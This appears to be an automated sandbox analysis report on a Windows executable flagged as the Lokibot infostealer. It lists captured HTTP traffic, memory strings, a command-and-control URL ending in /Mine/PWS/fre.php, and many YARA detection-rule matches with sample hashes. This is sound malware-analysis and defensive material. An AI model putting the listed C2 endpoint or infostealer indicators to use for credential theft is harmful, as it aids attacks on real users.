                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e9d9d415e82-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Wc9BoQ2cdOOUz9pULeesDopHaLV2YsoAss%2BRpNsV9XeGVgAZszBw9X4envSXhECfsr9Clm5p4LzfDXdaB6UHvAiFvfB6ahf1EB92EHDQ%2FkzLDjxAuYRN6j7p67%2F6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ea84db18c15-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hpkspz6Y7C9CA5kg8Ib7X1Dl4El6GK1wiB6QUyMxjiOkWktD%2FdbmTLnYGMa0EA9fRx5Go8WqBZA5sE0xWBk97H9PqekxhWo8bfE%2F8SmEWFN8oe3EC7%2B2K6e4riM%2FHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5eb48d1119db-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wLxYX05jqFpNoYU2cVY48f%2FkC1uY7%2B4l03%2FLR6M0HLtrJYCqSvwE6VR%2FDQZSapg5W01P6lhDJcScE996oUNCiWHKwfdHcsv9WzisfE%2BRtN%2FS4JBVP%2BXxT%2BW6EgRwg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5eba7cbf438c-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0SdfyeaGArd9vXPBT1vRE92Sn%2F6Abpe9kDzekg14vuiOsKKX2pRbyg5kch1SYBfEWwFMXzHOI2VUOXNRVpuFLSIyYpctWsDFCffpweFs5ORAiQGZwhx36AR0%2BHLXpg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ec019be4245-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrIaHGUajYRIJBQ2y70HstN%2FXK%2FIN%2B%2BQGicIrj0G4bEVdjzgi1KHWwJ%2Fk%2Fa8B5BmsOJ956q8lqClQd9U17Y3aQYhB5fpjK7CukqeTBsooVtO73aGrLWdg0pfu9s%2Bcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ec56fad7c84-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2BzWaR9gQE3MUuopuuXliGTqRJyCSnKgjIvsS80CdUvWqGRVmKjEisT8jh4Ea75KWLDpxxcPgkzdU8P7zGk1%2BkIc3V6zA94X75L0DqL%2B0RYmqTHsK7TKXrFFQcyEGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ecb5df14386-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: aspnet_compiler.exe, 00000002.00000002.3002581608.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.3003005750.0000000000E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dddotx.shop/Mine/PWS/fre.php

                System Summary

                barindex
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: 1e#U0414.exe PID: 6760, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: C:\Users\user\Desktop\1e#U0414.exeCode function: 0_2_032227C00_2_032227C0
                Source: C:\Users\user\Desktop\1e#U0414.exeCode function: 0_2_03220A980_2_03220A98
                Source: C:\Users\user\Desktop\1e#U0414.exeCode function: 0_2_0322515A0_2_0322515A
                Source: C:\Users\user\Desktop\1e#U0414.exeCode function: 0_2_0322536B0_2_0322536B
                Source: C:\Users\user\Desktop\1e#U0414.exeCode function: 0_2_032253A90_2_032253A9
                Source: C:\Users\user\Desktop\1e#U0414.exeCode function: 0_2_03220A870_2_03220A87
                Source: C:\Users\user\Desktop\1e#U0414.exeCode function: 0_2_03221C320_2_03221C32
                Source: C:\Users\user\Desktop\1e#U0414.exeCode function: 0_2_03221C400_2_03221C40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040549C2_2_0040549C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004029D42_2_004029D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00405B6F appears 42 times
                Source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBATMAN.dll. vs 1e#U0414.exe
                Source: 1e#U0414.exe, 00000000.00000000.1744817799.0000000000FFC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSept24.exe. vs 1e#U0414.exe
                Source: 1e#U0414.exe, 00000000.00000002.1750465955.0000000004484000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs 1e#U0414.exe
                Source: 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBATMAN.dll. vs 1e#U0414.exe
                Source: 1e#U0414.exe, 00000000.00000002.1751439929.0000000005880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs 1e#U0414.exe
                Source: 1e#U0414.exe, 00000000.00000002.1749617136.000000000153E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 1e#U0414.exe
                Source: 1e#U0414.exeBinary or memory string: OriginalFilenameSept24.exe. vs 1e#U0414.exe
                Source: 1e#U0414.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: 1e#U0414.exe PID: 6760, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 1e#U0414.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
